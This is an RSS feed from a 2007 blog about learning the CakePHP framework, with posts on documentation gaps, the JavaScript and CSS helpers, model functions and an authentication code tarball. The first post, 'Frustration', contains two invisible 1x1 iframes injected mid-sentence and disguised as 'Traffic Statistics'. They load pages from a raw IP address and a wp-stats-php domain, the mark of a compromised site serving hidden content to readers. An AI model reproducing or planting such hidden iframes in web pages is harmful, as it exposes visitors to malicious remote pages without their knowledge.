<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.1.2" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>letThemCodeCake</title>
	<link>http://letthemcodecake.com</link>
	<description>Coding Cake PHP Diary</description>
	<pubDate>Thu, 24 Jul 2008 18:27:15 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.1.2</generator>
	<language>en</language>
			<item>
		<title>Frustration</title>
		<link>http://letthemcodecake.com/learning-cakephp/frustration/</link>
		<comments>http://letthemcodecake.com/learning-cakephp/frustration/#comments</comments>
		<pubDate>Thu, 03 May 2007 15:45:11 +0000</pubDate>
		<dc:creator>Ian</dc:creator>
		
		<category><![CDATA[Learning Cakephp]]></category>

		<guid isPermaLink="false">http://letthemcodecake.com/learning-cakephp/frustration/</guid>
		<description><![CDATA[Have you ever been stuck 10 - 20 miles out in the middle of nowwhere   with a broken down car? Gas looks   fine, temp. is fine. The engine turns but just not quite enough to start. You&#8217;re faced with a question. Walk the 20 miles which you know will get you [...]]]></description>
			<content:encoded><![CDATA[<p>Have you ever been stuck 10 - 20 miles out in the middle of nowwhere<!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> with a broken down car? Gas looks<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> fine, temp. is fine. The engine turns but just not quite enough to start. You&#8217;re faced with a question. Walk the 20 miles which you know will get you where you&#8217;re going, or tinker with the car,which if you can get it working will get you there a whole lot faster. </p>
<p>That&#8217;s my experience with cake today. I&#8217;m still commited to using it. I&#8217;d like to help the community succeed, but the lack of significant documentation is crippling. Cake is great for the exact tasks that the tutorials outline, but after that it gets sketchy.</p>
<p>I&#8217;m working on a HasAndBelongsToMany (HABTM) article to try to explain how it works. It seems to only work when it wants to, and due to lack of documentation I can&#8217;t figure out when that is. I can&#8217;t find anything significant online at the moment, so I&#8217;ll be delving in to the code but if anyone would like to help or point a resource my way it&#8217;d be appreciated. </p>
<p>Thanks.</p>
]]></content:encoded>
			<wfw:commentRss>http://letthemcodecake.com/learning-cakephp/frustration/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Javascript Helper pt. 2</title>
		<link>http://letthemcodecake.com/learning-cakephp/javascript-helper-pt-2/</link>
		<comments>http://letthemcodecake.com/learning-cakephp/javascript-helper-pt-2/#comments</comments>
		<pubDate>Mon, 30 Apr 2007 17:59:53 +0000</pubDate>
		<dc:creator>Ian</dc:creator>
		
		<category><![CDATA[Learning Cakephp]]></category>

		<guid isPermaLink="false">http://letthemcodecake.com/learning-cakephp/javascript-helper-pt-2/</guid>
		<description><![CDATA[So I just read my last post about the javascript helper and I realized it makes little to no sense.
I was in a rush and just wanted to document the finding. Here&#8217;s a second try at explaining the js helper:
Using Javascript on your site.
1. Add the helper to the controller.
To use javascript in your cakephp [...]]]></description>
			<content:encoded><![CDATA[<p>So I just read my last post about the javascript helper and I realized it makes little to no sense.<br />
I was in a rush and just wanted to document the finding. Here&#8217;s a second try at explaining the js helper:</p>
<p>Using Javascript on your site.<br />
1. Add the helper to the controller.</p>
<p>To use javascript in your cakephp site you need to first set the $helpers array in your controller to:<br />
 <code>var $helpers = array('other_helper', 'javascript', 'other_helper'); </code></p>
<p>You&#8217;ll probably be using other helpers already so just add the &#8216;javascript&#8217; to the array.</p>
<p>2. Save your .js file under /app/webroot/js this is the conventional place to put all your js files and will make life easier for you if you use this directory. </p>
<p>3. Call your file from the template.</p>
<p>Since the call <code><br />
<script type="text/javascript" src="/project_name/js/myfile.js"></script>
<p></code><br />
 needs to be in the header of your page and all of your view templates get inserted after the <body> call of your layout template (/app/views/layouts/default.thtml) you&#8217;ll need to insert this line inside the <head> section:</p>
<p><code><?php echo $javascript->link(&#8221;myfile.js&#8221;);?></code></p>
<p>If you only want to include this in one page or in a class of pages you can create another layout template and call that from your controller using the $layout variable or the<br />
setLayout() function.</p>
<p>Iif you must use an externally located .js file you can use the function <code>$javascript->linkOut($url);</code></p>
<p>4. Use your javascript.</p>
<p>Now instead of writing out <scipt>function()</script etc. directly in your view you use:<br />
<code>$javascript->codeBlock("function();");</code> and that will insert the script tags for you.<br />
As of yet I don&#8217;t have much experience with the javascript helper so here is a list of functions litterally copied and pasted out of the 1.1 Helper:Javascript code. I&#8217;ll write more as I use the helper more.</p>
<p><strong>codeBlock </strong><br />
 * Returns a JavaScript script tag.<br />
 *<br />
 * @param  string $script The JavaScript to be wrapped in SCRIPT tags.<br />
 * @param  boolean $allowCache Allows the script to be cached if non-event caching is active<br />
 * @return string The full SCRIPT element, with the JavaScript inside it.</p>
<p><strong>escapeScript</strong><br />
 * Escape carriage returns and single and double quotes for JavaScript segments.<br />
 *<br />
 * @param string $script string that might have javascript elements<br />
 * @return string escaped string</p>
<p><strong>escapeString</strong><br />
 * Escape a string to be JavaScript friendly.<br />
 *<br />
 * List of escaped ellements:<br />
 *	+ &#8220;\r\n&#8221; => &#8216;\n&#8217;<br />
 *	+ &#8220;\r&#8221; => &#8216;\n&#8217;<br />
 *	+ &#8220;\n&#8221; => &#8216;\n&#8217;<br />
 *	+ &#8216;&#8221;&#8216; => &#8216;\&#8221;&#8216;<br />
 *	+ &#8220;&#8216;&#8221; => &#8220;\\&#8217;&#8221;<br />
 *<br />
 * @param  string $script String that needs to get escaped.<br />
 * @return string Escaped string.</p>
<p><strong>event </strong><br />
 * Attach an event to an element. Used with the Prototype library.<br />
 *<br />
 * @param string $object Object to be observed<br />
 * @param string $event event to observe<br />
 * @param string $observer function to call<br />
 * @param boolean $useCapture default true<br />
 * @return boolean true on success</p>
<p><strong>cacheEvents </strong><br />
 * Cache JavaScript events created with event()<br />
 *<br />
 * @param boolean $file If true, code will be written to a file<br />
 * @param boolean $all If true, all code written with JavascriptHelper will be sent to a file<br />
 * @return void</p>
<p><strong>writeEvents </strong><br />
 * Write cached JavaScript events<br />
 *<br />
 * @return string</p>
<p><strong>object</strong><br />
* Generates a JavaScript object in JavaScript Object Notation (JSON)<br />
 * from an array<br />
 *<br />
 * @param array $data Data to be converted<br />
 * @param boolean $block Wraps return value in a<br />
<script/> block if true<br />
 * @param string $prefix Prepends the string to the returned data<br />
 * @param string $postfix Appends the string to the returned data<br />
 * @param array $stringKeys A list of array keys to be treated as a string<br />
 * @param boolean $quoteKeys If false, treats $stringKey as a list of keys *not* to be quoted<br />
 * @param string $q The type of quote to use<br />
 * @return string A JSON code block</p>
]]></content:encoded>
			<wfw:commentRss>http://letthemcodecake.com/learning-cakephp/javascript-helper-pt-2/feed/</wfw:commentRss>
		</item>
		<item>
		<title>dAuth v0.3 tarball</title>
		<link>http://letthemcodecake.com/learning-cakephp/dauth-v03-tarball/</link>
		<comments>http://letthemcodecake.com/learning-cakephp/dauth-v03-tarball/#comments</comments>
		<pubDate>Sun, 01 Apr 2007 23:40:57 +0000</pubDate>
		<dc:creator>Ian</dc:creator>
		
		<category><![CDATA[Learning Cakephp]]></category>

		<guid isPermaLink="false">http://letthemcodecake.com/learning-cakephp/dauth-v03-tarball/</guid>
		<description><![CDATA[Dieter Plaetinck has created a really well thought-out user authentication system, dAuth for cakephp.
Php security can be a tricky beast, and web programmers can never learn enough about it. Dieter has evolved this project in bakery articles and it&#8217;s very useful to go through and read them all. Once you have and you understand how [...]]]></description>
			<content:encoded><![CDATA[<p>Dieter Plaetinck has created a really well thought-out user authentication system, <a href="http://bakery.cakephp.org/articles/view/147">dAuth</a> for cakephp.</p>
<p>Php security can be a tricky beast, and web programmers can never learn enough about it. Dieter has evolved this project in <a href="http://bakery.cakephp.org/articles/view/147">bakery</a> articles and it&#8217;s very useful to go through and read them all. Once you have and you understand how they work it&#8217;d be nice to be able to download all the code examples at once so that you can play with them easily in your cake project/favorite editor. </p>
<p>Well I&#8217;ve compiled all the code taken directly from his posted examples and put them in a tarball <a href="http://www.letthemcodecake.com/downloads/dauth.tgz">here.</a></p>
<p>Enjoy, but remember, it&#8217;s a bad idea to just copy/paste code from anywhere and use it in a production system. I suggest using this code as a template or learning example, before writing your own modified authentication code.</p>
<p>Mad Props Dieter,</p>
<p>Ian</p>
]]></content:encoded>
			<wfw:commentRss>http://letthemcodecake.com/learning-cakephp/dauth-v03-tarball/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Javascript Helper.</title>
		<link>http://letthemcodecake.com/learning-cakephp/8/</link>
		<comments>http://letthemcodecake.com/learning-cakephp/8/#comments</comments>
		<pubDate>Fri, 30 Mar 2007 19:21:43 +0000</pubDate>
		<dc:creator>Ian</dc:creator>
		
		<category><![CDATA[Learning Cakephp]]></category>

		<guid isPermaLink="false">http://letthemcodecake.com/learning-cakephp/8/</guid>
		<description><![CDATA[How does the javascript helper work?
$javascript-&#62;link() function.
Youl&#8217;d think there&#8217;d be a section in the manual under the helpers saying:
Css helper, called by $css-&#62;function(). Here&#8217;s a list of fuctions.
Javascript helper, called by $javascript-&#62;function(). etc.
It looks like the rule of thumb is the full word, lowercase, prefixed with a $ sign, and be sure to add the [...]]]></description>
			<content:encoded><![CDATA[<p>How does the javascript helper work?</p>
<p>$javascript-&gt;link() function.<br />
Youl&#8217;d think there&#8217;d be a section in the manual under the helpers saying:<br />
Css helper, called by $css-&gt;function(). Here&#8217;s a list of fuctions.<br />
Javascript helper, called by $javascript-&gt;function(). etc.</p>
<p>It looks like the rule of thumb is the full word, lowercase, prefixed with a $ sign, and be sure to add the Helper name in your controller. So to use the javascript ( along with html and form) helper:<br />
I set $var $helpers = (&#8217;Html&#8217;, &#8216;Form&#8217;, &#8216;Javascript&#8217;); in my controller.</p>
]]></content:encoded>
			<wfw:commentRss>http://letthemcodecake.com/learning-cakephp/8/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Advanced Model functions</title>
		<link>http://letthemcodecake.com/learning-cakephp/advanced-model-functions/</link>
		<comments>http://letthemcodecake.com/learning-cakephp/advanced-model-functions/#comments</comments>
		<pubDate>Fri, 23 Mar 2007 16:23:29 +0000</pubDate>
		<dc:creator>Ian</dc:creator>
		
		<category><![CDATA[Learning Cakephp]]></category>

		<guid isPermaLink="false">http://www.letthemcodecake.com/?p=6</guid>
		<description><![CDATA[  




clipped from cake-php.blogspot.com
Unless you delve in to the API, there are some very useful model functions at your disposal you might not know exist. I highly recommend reading over the Model Class Reference at least once. Here&#8217;s a few key functions I wasn&#8217;t aware of that I found to be very useful: 


generateList() [...]]]></description>
			<content:encoded><![CDATA[<div >  </div>
<table cellpadding="0" cellspacing="0" style="margin: 12px 0px; font-family: arial; color: #333333; background: #ffffff; border: solid 4px #e5e5e5; width: 100%; clear: left;">
<tr>
<td valign="top"><!-- BEGIN_CLIP_CONTENT ID:9D94F0F1-F770-40B6-9DF4-B0BC2B177D76:0 CLIPMARKS.COM -->
<div class="CM_CTB_Content_Wrap" style="background-color: #ffffff;">
<div style="border-bottom: solid 1px #dcdcdc; white-space: nowrap; margin-bottom: 8px; background-color: #eeeeee ;background-image: url(http://clipmarks.com/images/source-bg.gif); background-repeat: repeat-x; height: 24px; line-height: 24px; vertical-align: middle; padding-bottom: 4px; color: #666666; font-size: 10px;" ><a href="http://clipmarks.com/popular/" title="see clips that are hot right now"><img src="http://clipmarks.com/images/clip-icon.gif" alt="" width="19" height="19" border="0" style="vertical-align: middle; margin: 0px 4px; display: inline; border: none; float:none;" /></a>clipped from <a title="http://cake-php.blogspot.com/2006/09/21-things-you-must-know-about-cakephp.html" href="http://cake-php.blogspot.com/2006/09/21-things-you-must-know-about-cakephp.html" style="color: #157EBA; font-size: 11px;">cake-php.blogspot.com</a></div>
<blockquote style="text-align: left; padding: 0px 8px; margin: 4px 0px 8px 0px; background: transparent; border: none;" cite="http://cake-php.blogspot.com/2006/09/21-things-you-must-know-about-cakephp.html"><p><P>Unless you delve in to the API, there are some very useful model functions at your disposal you might not know exist. I highly recommend reading over the <A href="http://api.cakephp.org/class_model.html">Model Class Reference</A> at least once. Here&#8217;s a few key functions I wasn&#8217;t aware of that I found to be very useful: </P></p></blockquote>
<div style="height: 2px; font-size: 2px; background: #dcdcdc; border-bottom: solid 1px #f5f5f5; margin: 2px 4px;"></div>
<blockquote style="text-align: left; padding: 0px 8px; margin: 4px 0px 8px 0px; background: transparent; border: none;" cite="http://cake-php.blogspot.com/2006/09/21-things-you-must-know-about-cakephp.html"><p><UL>
<li style="margin-left:16px;padding-left: 0px;"><A href="http://api.cakephp.org/class_model.html#e8844b859626edc554946480046e395f">generateList()</A> - I use this function primarily to populate select boxes with data from associated tables  </LI>
<li style="margin-left:16px;padding-left: 0px;"><A href="http://api.cakephp.org/class_model.html#6489e2300b9002286e49d48f51004332">findBySql()</A> - Sometimes you just need to write your own SQL  </LI>
<li style="margin-left:16px;padding-left: 0px;"><A href="http://api.cakephp.org/class_model.html#0978aba07f5d196079d7518a99bcfa86">findCount()</A> - Returns number of rows matching given SQL condition  </LI>
<li style="margin-left:16px;padding-left: 0px;"><A href="http://api.cakephp.org/class_model.html#1bc86347df904da22e555b1f9aa78970">hasAny()</A> - Returns true if a record that meets the given conditions exists. </LI></UL></p></blockquote>
<div style="height: 2px; font-size: 2px; background: #dcdcdc; border-bottom: solid 1px #f5f5f5; margin: 2px 4px;"></div>
<blockquote style="text-align: left; padding: 0px 8px; margin: 4px 0px 8px 0px; background: transparent; border: none;" cite="http://cake-php.blogspot.com/2006/09/21-things-you-must-know-about-cakephp.html"><p><P>Again, I highly recommend reading over the entire <A href="http://api.cakephp.org/class_model.html">model class reference</A>, you&#8217;ll be surprised at what you learn. </P></p></blockquote>
<div style="height: 2px; font-size: 2px; background: #dcdcdc; border-bottom: solid 1px #f5f5f5; margin: 2px 4px;"></div>
<blockquote style="text-align: left; padding: 0px 8px; margin: 4px 0px 8px 0px; background: transparent; border: none;" cite="http://cake-php.blogspot.com/2006/09/21-things-you-must-know-about-cakephp.html"><p><H4>Advanced model functions</H4></p></blockquote>
</div>
<p><!-- END_CLIP_CONTENT --></td>
</tr>
</table>
<div style="margin: 12px 4px;">
<table style="font-size: 11px;" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><b>&nbsp;</b></td>
<td align="right"><a href="http://clipmarks.com" title="go to clipmarks.com"><img src="http://clipmarks.com/images/post-by-clipmarks.png" border="0" alt="powered by clipmarks" width="68" height="16" style="border: none;" /></a></td>
</tr>
</table>
</div>
]]></content:encoded>
			<wfw:commentRss>http://letthemcodecake.com/learning-cakephp/advanced-model-functions/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to use models and controllers in your webpages.</title>
		<link>http://letthemcodecake.com/learning-cakephp/how-to-use-models-and-controllers-in-your-webpages/</link>
		<comments>http://letthemcodecake.com/learning-cakephp/how-to-use-models-and-controllers-in-your-webpages/#comments</comments>
		<pubDate>Fri, 23 Mar 2007 16:22:22 +0000</pubDate>
		<dc:creator>Ian</dc:creator>
		
		<category><![CDATA[Learning Cakephp]]></category>

		<guid isPermaLink="false">http://www.letthemcodecake.com/?p=5</guid>
		<description><![CDATA[When first getting started I was quite perplexed as how to build a page that has more than one model and controller attached to it.
If /users/index runs the Users::index() function and the users controller uses the User model then how do I look at data from, say a Profile model on that page? What if [...]]]></description>
			<content:encoded><![CDATA[<p>When first getting started I was quite perplexed as how to build a page that has more than one model and controller attached to it.</p>
<p>If /users/index runs the Users::index() function and the users controller uses the User model then how do I look at data from, say a Profile model on that page? What if I want to have my login function on that page as well?</p>
<p>Well once you get your head around it it&#8217;s not that tough, but it took me an embarrassingly long time to get my head around it. </p>
<p>By default the page you go to example.com/users/index is loading the app/views/users/index.thtml file. It&#8217;s also running the function index() in app/controllers/users_controller.php and loading the app/models/user.php. </p>
<p>The model tells cake how to interact with the database, and what tables to access.</p>
<p>The controller possibly runs some logic and passes variables to the view.</p>
<p>But the view is in control here. The view loads the html, displays the variables the controller passed (using the set function), and links and forms etc. </p>
<p>So if you want a login form on your index page you simply put that form in your index view and have it submit to /users/login (or whatever function handles the login logic). When you submit that form you&#8217;re running that function, not before. </p>
<p>If you want to display information generated (by business logic) in other functions then you can run those functions inside of your index() function. But I think more often you&#8217;ll probably want to load data from other models.</p>
<p>I&#8217;ll talk about that and the details in my next post.</p>
]]></content:encoded>
			<wfw:commentRss>http://letthemcodecake.com/learning-cakephp/how-to-use-models-and-controllers-in-your-webpages/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How does CSS work in CakePhp?</title>
		<link>http://letthemcodecake.com/learning-cakephp/4/</link>
		<comments>http://letthemcodecake.com/learning-cakephp/4/#comments</comments>
		<pubDate>Fri, 23 Mar 2007 16:05:27 +0000</pubDate>
		<dc:creator>Ian</dc:creator>
		
		<category><![CDATA[Learning Cakephp]]></category>

		<guid isPermaLink="false">http://www.letthemcodecake.com/?p=4</guid>
		<description><![CDATA[To use cakephp&#8217;s framework to the fullest, you need to utilize its conventions. To modify the default template for your site copy:
/cake/libs/view/templates/layouts/default.thtml
 to /app/views/layouts/
You then edit that copied file. The presence of
/app/views/layouts/default.thtml
tells cake to stop looking at the old layout and look at the new one.
So you&#8217;d think that it would work the same way [...]]]></description>
			<content:encoded><![CDATA[<p>To use cakephp&#8217;s framework to the fullest, you need to utilize its conventions. To modify the default template for your site copy:</p>
<pre>/cake/libs/view/templates/layouts/default.thtml
 to /app/views/layouts/</pre>
<p>You then edit that copied file. The presence of</p>
<pre>/app/views/layouts/default.thtml</pre>
<p>tells cake to stop looking at the old layout and look at the new one.</p>
<p>So you&#8217;d think that it would work the same way with css. Well almost. You don&#8217;t need to copy the css file, it&#8217;s already there for you in</p>
<pre>/app/webroot/css/cake.generic.css</pre>
<p>Ok great. Just delete that and copy your new css over the old stuff right? No, that&#8217;s not a great idea. If you do that you&#8217;ll lose all the cool cakephp css classes that you may want to take advantage of later on. For example &#8216;required&#8217; and &#8216;optional&#8217; classes for your form labels. Let&#8217;s keep the generic css and overwrite it&#8217;s classes as we need them.</p>
<p>How do we do that? Let&#8217;s go to the default.thtml and we&#8217;ll see:</p>
<pre>$html-&gt;css('cake.generic');</pre>
<p>That&#8217;s the same as putting</p>
<pre>&lt;<span class="start-tag">link</span><span class="attribute-name"> rel</span>=<span class="attribute-value">&#8220;stylesheet&#8221; </span><span class="attribute-name">type</span>=<span class="attribute-value">&#8220;text/css&#8221; </span>
<span class="attribute-name">href</span>=<span class="attribute-value">&#8220;/ProjectPath/css/cake.generic.css&#8221; </span><span class="error"><span class="attribute-name">/</span></span>&gt;</pre>
<p>In your html code. Well that&#8217;s not exactly what we want to use because we want to use the @import url code to import our css files rather than link them.<br />
Luckily the HtmlHelper::css function has an import option. So we use:<br />
$html-&gt;css(&#8217;cake.custom&#8217;, import);</p>
<p>which yields :</p>
<pre>@import url(ProjectPath/css/cake.custom.css);</pre>
<p>between style tags.<br />
Now that you have an idea of how the html helper css function works you can check out how to auto-load your css files for each <a href="http://bakery.cakephp.org/articles/view/215">controller</a>.</p>
<p>Thanks,<br />
Ian</p>
]]></content:encoded>
			<wfw:commentRss>http://letthemcodecake.com/learning-cakephp/4/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Hi, my name is Ian and I program in the Cakephp framework.</title>
		<link>http://letthemcodecake.com/learning-cakephp/hi-my-name-is-ian-and-i-program-in-the-cakephp-framework/</link>
		<comments>http://letthemcodecake.com/learning-cakephp/hi-my-name-is-ian-and-i-program-in-the-cakephp-framework/#comments</comments>
		<pubDate>Fri, 23 Mar 2007 16:04:52 +0000</pubDate>
		<dc:creator>Ian</dc:creator>
		
		<category><![CDATA[Learning Cakephp]]></category>

		<guid isPermaLink="false">http://www.letthemcodecake.com/?p=3</guid>
		<description><![CDATA[&#8220;Hi Ian&#8221;
I&#8217;m a new developer that has been happily &#60;a href=&#8221;http://bakery.cakephp.org/articles/view/159&#8243;&#62;seduced&#60;/a&#62; into doing a project or two in the Cakephp framework.
I&#8217;m starting this blog because I feel that the learning curve is still a little bit to high, and despite some very good efforts from the cakephp &#60;a href=&#8221;http://bakery.cakephp.org/&#8221;&#62;community&#60;/a&#62; and &#60;a href=&#8221;https://www6.software.ibm.com/developerworks/education/os-php-cake1/&#8221;&#62;others&#60;/a&#62; to welcome newcomers [...]]]></description>
			<content:encoded><![CDATA[<p>&#8220;Hi Ian&#8221;</p>
<p>I&#8217;m a new developer that has been happily &lt;a href=&#8221;http://bakery.cakephp.org/articles/view/159&#8243;&gt;seduced&lt;/a&gt; into doing a project or two in the Cakephp framework.</p>
<p>I&#8217;m starting this blog because I feel that the learning curve is still a little bit to high, and despite some very good efforts from the cakephp &lt;a href=&#8221;http://bakery.cakephp.org/&#8221;&gt;community&lt;/a&gt; and &lt;a href=&#8221;https://www6.software.ibm.com/developerworks/education/os-php-cake1/&#8221;&gt;others&lt;/a&gt; to welcome newcomers most of the documentation is either in the form of tutorials, the manual, or message boards.</p>
<p>The tutorials that are out there are great but they can only do so much. The manual is still young and needs more content, and as we all know you can only expect so much out of message boards, sometimes they have exactly what you want, sometimes not.</p>
<p>The theme I get from the manual and the message boards is &#8220;if you knew how to use cake this would be easy&#8221;.  The theme should be &#8220;You&#8217;re probably very smart, but you&#8217;ve got no experience with our way of doing things and you&#8217;ve done this your own way many times before, let&#8217;s give you the resources  you need to  start programming more effectively&#8221;.</p>
<p>This is my first post,  look out for more posts, asking questions, and giving answers on the fundamentals of cakephp.</p>
<p>Thanks,<br />
Ian</p>
]]></content:encoded>
			<wfw:commentRss>http://letthemcodecake.com/learning-cakephp/hi-my-name-is-ian-and-i-program-in-the-cakephp-framework/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
